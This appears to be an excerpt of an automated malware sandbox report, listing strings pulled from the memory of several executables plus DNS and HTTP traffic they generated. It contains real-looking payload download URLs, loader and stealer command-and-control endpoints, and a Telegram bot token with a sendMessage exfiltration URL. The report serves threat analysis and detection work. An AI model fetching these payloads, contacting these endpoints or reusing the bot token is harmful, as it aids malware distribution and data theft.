Source: 6eea3e30e9.exe, 0000000D.00000003.2601864727.000001FED9294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: da":{"cohort":"1::","cohortname":"","dlrc":6120,"installdate":6120,"pf":"dcb37f49-aa68-4ebc-a8d4-14eaa556e331"}}},"web_app":{"app_id":{"install_url":{"aghbiahbpaijignceidepookljebhfak":["https://drive.google.com/drive/installwebapp?usp=chrome_default"],"agimnkijcaahngcdmfeangaknmldooml":["https://www.youtube.com/s/notifications/manifest/cr_install.html"],"fhihpiojkbmbpdjeoajapmgkhlnakfjf":["https://docs.google.com/spreadsheets/installwebapp?usp=chrome_default"],"fmgjjmmmlfnkbppncabfkddbjimcfncm":["https://mail.google.com/mail/installwebapp?usp=chrome_default"],"kefjledonklijopmnomlcbpllchaibag":["https://docs.google.com/presentation/installwebapp?usp=chrome_default"],"mpnpojknpmmopombnjdcgaaiekajbnjb":["https://docs.google.com/document/installwebapp?usp=chrome_default"]}}},"web_apps":{"did_migrate_default_chrome_apps":["MigrateDefaultChromeAppToWebAppsGSuite","MigrateDefaultChromeAppToWebAppsNonGSuite"],"last_preinstall_synchronize_version":"117","migrated_default_apps":["aohghmighlieiainnegkcijnfilokake","aapocclcgogkmnckokdopfmhonfmgoek","felcaaldnbdncclmgdcncolpebgiejap","apdfllckaahabafndbhieahigkjlhalf","pjkljhegncpnkpknbcohdijeoejaedia","blpcfgokakmgnkcojhhkbfbldkacnbeo"]},"zerosuggest":{"cachedresults":")]}'\n[\"\",[\"one piece chapter 1094 spoilers twitter\",\"baltimore drinking water parasites\",\"assassin creed mirage release\",\"rwd tesla model y\",\"michigan hockey johnny druskinis\",\"loki season 2 jonathan majors\",\"google pixel 8 pro leaks\",\"amazon prime deals prime day\"],[\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\"],[],{\"google:clientdata\":{\"bpc\":false,\"tlw\":false},\"google:groupsinfo\":\"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\\u003d\",\"google:suggestdetail\":[{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002},{\"zl\":10002}],\"google:suggestrelevance\":[1257,1256,1255,1254,1253,1252,1251,1250],\"google:suggestsubtypes\":[[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362],[3,143,362]],\"google:suggesttype\":[\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\",\"QUERY\"]}]"}}chedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340886957835794","type":2,"window_count":0},{"crashed":false,"time":"13340886960923866","type":0},{"did_schedule_command":true,"first_session_service":true,"tab_count":1,"time":"13340886965177921","type":2,"window_count":1},{"crashed":false,"time":"13340890857002147","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890857032656","type":2,"window_count":0},{"crashed":false,"time":"13340890860222296","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890860225507","type":2,"window_count":0},{"crashed":false,"time":"13340890862208495","type":0},{"did_schedule_command":false,"first_session_service":true,"tab_count":0,"time":"13340890862220490","type":2,"window_count":0},{"crashed":false,"time"
Source: global traffic DNS traffic detected: DNS query: cheapptaxysu.click
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: ipinfo.io
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: global traffic DNS traffic detected: DNS query: httpbin.org
Source: global traffic DNS traffic detected: DNS query: home.fivetk5ht.top
Source: global traffic DNS traffic detected: DNS query: treehoneyi.click
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cheapptaxysu.click
Source: global traffic HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 21 Dec 2024 17:16:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oj8NPlXgGxU6%2FUVST66rq2S3pL93iP%2FRlgRL7RDcXmRIkJpSJvHmi66FKlPFNWhi56XD%2FjTZrZ9oibySgAANUap1lrH8LGkLNf%2BKDSVi1Iwo9Qj1itZIHCP5HJocbZCITWZZGm0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f5984ea3b1c8c69-EWR
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://.css
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://.jpg
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpWgSLMx
Source: Gxtuum.exe, 00000031.00000002.2987689821.000000000165A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/
Source: Gxtuum.exe, 00000031.00000002.2987689821.0000000001661000.00000004.00000020.00020000.00000000.sdmp, Gxtuum.exe, 00000031.00000002.2987689821.0000000001617000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.php
Source: Gxtuum.exe, 00000031.00000002.2987689821.0000000001617000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://212.193.31.8/3ofn3jf3e2ljk2/index.phpa
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B60000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/burpin1/random.exe_
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2990887486.0000000000B78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/geopoxid/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/geopoxid/random.exe1
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B78000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/geopoxid/random.exeh
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B8E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/geopoxid/random.exei
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/kardanvalov88/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe01
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe2
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe84
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exe84760
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeC:
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeLMEMXH
Source: skotes.exe, 00000006.00000002.2990887486.0000000000B3B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeSSC:
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeTemp
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.execoded
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exee
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeegUF
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exeu
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/karl/random.exexe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/loadman/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/martin/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/martin/random.exe.
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exe
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://31.41.244.11/files/zhigarko/random.exeu
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.00000000019C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPR
Source: 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv17
Source: 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.000000000194E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argume
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.000000000194E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argume4
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.00000000019C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.00000000019C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851?argument=uKsqdVCOyF9DZVCd1734801424L
Source: 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp
Source: 1b73492cb0.exe, 0000002D.00000002.2992166550.00000000019C2000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://home.fivetk5ht.top/zldPRividual
Source: 1b73492cb0.exe, 0000002D.00000003.2832287597.0000000007546000.00000004.00001000.00020000.00000000.sdmp, 1b73492cb0.exe, 0000002D.00000002.2985058895.0000000000A8D000.00000040.00000001.01000000.00000014.sdmp String found in binary or memory: http://html4/loose.dtd
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: skotes.exe, 00000006.00000002.2990887486.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: 8aec52a3fa.exe, 0000000F.00000000.2692607710.0000000000423000.00000002.00000001.01000000.0000000F.sdmp String found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.c.lencr.org/0
Source: 0516ff61af.exe, 00000007.00000003.2548566163.0000000005E0F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://x1.i.lencr.org/0
Source: 0516ff61af.exe, 00000007.00000003.2502972379.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2502885183.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2591590163.000002479E952000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000002.2715905894.000002479E952000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2591675391.000002479E952000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2601864727.000001FED9297000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2601294829.000001FED9295000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604560234.000001FED9294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://accounts.google.com
Source: 6eea3e30e9.exe, 0000000C.00000002.2716618806.00000247A0670000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED92AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED9307000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/-application-key
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED92AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/:
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED9307000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/C
Source: 6eea3e30e9.exe, 0000000C.00000002.2716618806.00000247A0670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/G
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED92AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/Z
Source: 6eea3e30e9.exe, 0000000D.00000000.2577423521.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: 6eea3e30e9.exe, 0000000D.00000002.2737853612.000001FED9E00000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED92AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
Source: 6eea3e30e9.exe, 0000000C.00000002.2716799079.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000C.00000000.2570471769.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000002.2738064179.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp, 6eea3e30e9.exe, 0000000D.00000000.2577423521.00007FF7ECDD0000.00000002.00000001.01000000.0000000D.sdmp String found in binary or memory: https://api.telegram.org/botFailed
Source: 6eea3e30e9.exe, 0000000C.00000002.2715905894.000002479E9F1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/edia
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED92AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/j
Source: 6eea3e30e9.exe, 0000000C.00000002.2716618806.00000247A0670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/pb
Source: 6eea3e30e9.exe, 0000000C.00000002.2716618806.00000247A0670000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/r
Source: 6eea3e30e9.exe, 0000000D.00000002.2737312768.000001FED92AE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/rn
Source: 0516ff61af.exe, 00000007.00000003.2572778765.000000000145C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: 0516ff61af.exe, 00000007.00000003.2572778765.000000000145C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: 0516ff61af.exe, 00000007.00000003.2502972379.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2502885183.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 0516ff61af.exe, 00000007.00000003.2502972379.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2502885183.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: 0516ff61af.exe, 00000007.00000003.2502972379.0000000005E19000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2502885183.0000000005E1B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: 0516ff61af.exe, 00000007.00000003.2605595676.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2605393319.0000000001422000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2609253433.0000000001433000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2605141063.000000000140C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click
Source: 0516ff61af.exe, 00000007.00000003.2665947915.0000000001441000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2573804506.0000000005DE5000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665588166.00000000013AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/
Source: 0516ff61af.exe, 00000007.00000003.2501717799.00000000013D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/77
Source: 0516ff61af.exe, 0516ff61af.exe, 00000007.00000003.2622229704.000000000140C000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2478796488.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2622229704.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2605595676.000000000142B000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2667184074.00000000013EC000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2605393319.0000000001422000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665757941.0000000001425000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2501989672.00000000013EB000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2605141063.000000000140C000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2667288155.0000000001427000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2501717799.00000000013CB000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2501717799.00000000013D6000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2666977755.00000000013AA000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665588166.00000000013AA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api
Source: 0516ff61af.exe, 00000007.00000003.2622110220.0000000001433000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api:
Source: 0516ff61af.exe, 00000007.00000003.2501895952.00000000013B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/api?
Source: 0516ff61af.exe, 00000007.00000003.2622229704.000000000140C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click/apiB
Source: 0516ff61af.exe, 0516ff61af.exe, 00000007.00000003.2605595676.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2622110220.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2525794793.0000000005DD6000.00000004.00000800.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2583168665.0000000001443000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click:443/api
Source: 0516ff61af.exe, 00000007.00000003.2665757941.0000000001425000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000002.2667288155.0000000001427000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click:443/apiT
Source: 0516ff61af.exe, 00000007.00000003.2622110220.0000000001443000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665997926.0000000001448000.00000004.00000020.00020000.00000000.sdmp, 0516ff61af.exe, 00000007.00000003.2665947915.0000000001441000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cheapptaxysu.click:443/apinQG
Source: 6eea3e30e9.exe, 0000000D.00000003.2605342438.000001FED92A1000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604805622.000001FED92A0000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604560234.000001FED9294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.goo2
Source: 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstore
Source: 6eea3e30e9.exe, 0000000C.00000003.2592212871.000002479E985000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2592697045.000002479E991000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2592794468.000002479E998000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreD
Source: 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2605292956.000001FED92DE000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreb
Source: 6eea3e30e9.exe, 0000000C.00000003.2592025523.000002479E968000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000C.00000003.2592070604.000002479E984000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://chrome.google.com/webstoreu
Source: 6eea3e30e9.exe, 0000000D.00000003.2605196927.000001FED92BF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx
Source: 6eea3e30e9.exe, 0000000C.00000003.2592375759.000002479E952000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crx4298
Source: 6eea3e30e9.exe, 0000000D.00000003.2605641404.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604919153.000001FED92CA000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604264704.000001FED92C6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxA0FD
Source: 6eea3e30e9.exe, 0000000C.00000003.2592025523.000002479E968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxL
Source: 6eea3e30e9.exe, 0000000D.00000003.2603920378.000001FED92B3000.00000004.00000020.00020000.00000000.sdmp, 6eea3e30e9.exe, 0000000D.00000003.2604374375.000001FED92B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxO
Source: 6eea3e30e9.exe, 0000000C.00000003.2592025523.000002479E968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxX
Source: 6eea3e30e9.exe, 0000000C.00000003.2592025523.000002479E968000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://clients2.google.com/service/update2/crxl
Source: 0516ff61af.exe, 00000007.00000003.2572778765.000000000145C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
